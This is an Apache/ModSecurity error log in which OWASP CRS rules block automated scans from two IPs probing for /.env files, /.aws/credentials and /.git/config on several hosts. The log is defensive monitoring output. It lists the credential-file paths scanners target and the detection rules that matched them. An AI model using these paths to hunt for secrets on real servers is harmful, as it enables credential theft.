[Wed Jul 24 20:08:12.763902 2024] [:error] [pid 660448] [client 179.43.149.114:42968] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqFDDAmPaiQ6KYI19CoSIQAAAAM"]
[Wed Jul 24 20:08:12.764490 2024] [:error] [pid 660448] [client 179.43.149.114:42968] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqFDDAmPaiQ6KYI19CoSIQAAAAM"]
[Wed Jul 24 20:08:12.764951 2024] [:error] [pid 660448] [client 179.43.149.114:42968] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqFDDAmPaiQ6KYI19CoSIQAAAAM"]
[Wed Jul 24 20:08:12.829922 2024] [authz_core:error] [pid 660450] [client 179.43.149.114:42984] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Jul 24 20:08:17.865284 2024] [:error] [pid 660449] [client 179.43.149.114:54120] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqFDEaB5R5Zx0jhK-7XdMAAAAAQ"]
[Wed Jul 24 20:08:17.865843 2024] [:error] [pid 660449] [client 179.43.149.114:54120] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqFDEaB5R5Zx0jhK-7XdMAAAAAQ"]
[Wed Jul 24 20:08:17.866279 2024] [:error] [pid 660449] [client 179.43.149.114:54120] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqFDEaB5R5Zx0jhK-7XdMAAAAAQ"]
[Wed Jul 24 20:08:17.921600 2024] [:error] [pid 661734] [client 179.43.149.114:54130] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqFDEYoSyrkJp9vfMjzD_wAAAAY"]
[Wed Jul 24 20:08:17.922044 2024] [:error] [pid 661734] [client 179.43.149.114:54130] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqFDEYoSyrkJp9vfMjzD_wAAAAY"]
[Wed Jul 24 20:08:17.922496 2024] [:error] [pid 661734] [client 179.43.149.114:54130] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqFDEYoSyrkJp9vfMjzD_wAAAAY"]
[Wed Jul 24 20:08:17.976222 2024] [:error] [pid 671328] [client 179.43.149.114:54132] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqFDETSD83qOAI4G6KEFgAAAAAk"]
[Wed Jul 24 20:08:17.976774 2024] [:error] [pid 671328] [client 179.43.149.114:54132] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqFDETSD83qOAI4G6KEFgAAAAAk"]
[Wed Jul 24 20:08:17.977266 2024] [:error] [pid 671328] [client 179.43.149.114:54132] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqFDETSD83qOAI4G6KEFgAAAAAk"]
[Wed Jul 24 20:08:18.140265 2024] [:error] [pid 660447] [client 179.43.149.114:54156] [client 179.43.149.114] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqFDEid21XQDxESSb_zb8gAAAAI"]
[Wed Jul 24 20:08:18.140798 2024] [:error] [pid 660447] [client 179.43.149.114:54156] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqFDEid21XQDxESSb_zb8gAAAAI"]
[Wed Jul 24 20:08:18.141250 2024] [:error] [pid 660447] [client 179.43.149.114:54156] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqFDEid21XQDxESSb_zb8gAAAAI"]
[Wed Jul 24 20:08:18.393380 2024] [:error] [pid 671327] [client 179.43.149.114:54166] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqFDEkGoHDw_kFjIxIE4UgAAAAg"]
[Wed Jul 24 20:08:18.393851 2024] [:error] [pid 671327] [client 179.43.149.114:54166] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqFDEkGoHDw_kFjIxIE4UgAAAAg"]
[Wed Jul 24 20:08:18.394325 2024] [:error] [pid 671327] [client 179.43.149.114:54166] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqFDEkGoHDw_kFjIxIE4UgAAAAg"]
[Thu Jul 25 02:36:27.803623 2024] [:error] [pid 680096] [client 179.43.149.114:44728] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqGeC1cNmBWpsu-cdyiecAAAAAI"]
[Thu Jul 25 02:36:27.804177 2024] [:error] [pid 680096] [client 179.43.149.114:44728] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqGeC1cNmBWpsu-cdyiecAAAAAI"]
[Thu Jul 25 02:36:27.804701 2024] [:error] [pid 680096] [client 179.43.149.114:44728] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqGeC1cNmBWpsu-cdyiecAAAAAI"]
[Thu Jul 25 02:36:27.849399 2024] [:error] [pid 680097] [client 179.43.149.114:44730] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqGeCxsnseMH_FYX7xnE8wAAAAM"]
[Thu Jul 25 02:36:27.849887 2024] [:error] [pid 680097] [client 179.43.149.114:44730] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqGeCxsnseMH_FYX7xnE8wAAAAM"]
[Thu Jul 25 02:36:27.850373 2024] [:error] [pid 680097] [client 179.43.149.114:44730] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZqGeCxsnseMH_FYX7xnE8wAAAAM"]
[Thu Jul 25 02:36:28.124119 2024] [authz_core:error] [pid 680099] [client 179.43.149.114:44736] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Thu Jul 25 02:36:28.164040 2024] [:error] [pid 681219] [client 179.43.149.114:44748] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqGeDEKRXbF992Xq4RTVvAAAAAU"]
[Thu Jul 25 02:36:28.164864 2024] [:error] [pid 681219] [client 179.43.149.114:44748] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqGeDEKRXbF992Xq4RTVvAAAAAU"]
[Thu Jul 25 02:36:28.165290 2024] [:error] [pid 681219] [client 179.43.149.114:44748] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "ZqGeDEKRXbF992Xq4RTVvAAAAAU"]
[Thu Jul 25 02:36:28.199936 2024] [:error] [pid 680298] [client 179.43.149.114:44756] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqGeDJbFvIQR1EFMAHABogAAAAA"]
[Thu Jul 25 02:36:28.200447 2024] [:error] [pid 680298] [client 179.43.149.114:44756] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqGeDJbFvIQR1EFMAHABogAAAAA"]
[Thu Jul 25 02:36:28.200948 2024] [:error] [pid 680298] [client 179.43.149.114:44756] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "ZqGeDJbFvIQR1EFMAHABogAAAAA"]
[Thu Jul 25 02:36:28.237511 2024] [:error] [pid 680098] [client 179.43.149.114:44760] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqGeDKjRQzSUzhLVezSR8QAAAAc"]
[Thu Jul 25 02:36:28.238005 2024] [:error] [pid 680098] [client 179.43.149.114:44760] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqGeDKjRQzSUzhLVezSR8QAAAAc"]
[Thu Jul 25 02:36:28.238417 2024] [:error] [pid 680098] [client 179.43.149.114:44760] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "ZqGeDKjRQzSUzhLVezSR8QAAAAc"]
[Thu Jul 25 02:36:28.389683 2024] [:error] [pid 680100] [client 179.43.149.114:44776] [client 179.43.149.114] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqGeDC-3dWhIC-UuO5syKwAAAA4"]
[Thu Jul 25 02:36:28.390164 2024] [:error] [pid 680100] [client 179.43.149.114:44776] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqGeDC-3dWhIC-UuO5syKwAAAA4"]
[Thu Jul 25 02:36:28.390584 2024] [:error] [pid 680100] [client 179.43.149.114:44776] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZqGeDC-3dWhIC-UuO5syKwAAAA4"]
[Thu Jul 25 02:36:28.441341 2024] [:error] [pid 680299] [client 179.43.149.114:44778] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqGeDPmCZOZyBXYgT7TM-AAAAAE"]
[Thu Jul 25 02:36:28.441813 2024] [:error] [pid 680299] [client 179.43.149.114:44778] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqGeDPmCZOZyBXYgT7TM-AAAAAE"]
[Thu Jul 25 02:36:28.442231 2024] [:error] [pid 680299] [client 179.43.149.114:44778] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "ZqGeDPmCZOZyBXYgT7TM-AAAAAE"]
[Fri Jul 26 05:09:39.930333 2024] [:error] [pid 718940] [client 45.148.10.142:53230] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMTc1ZZb08EShEGKymsHgAAAAY"]
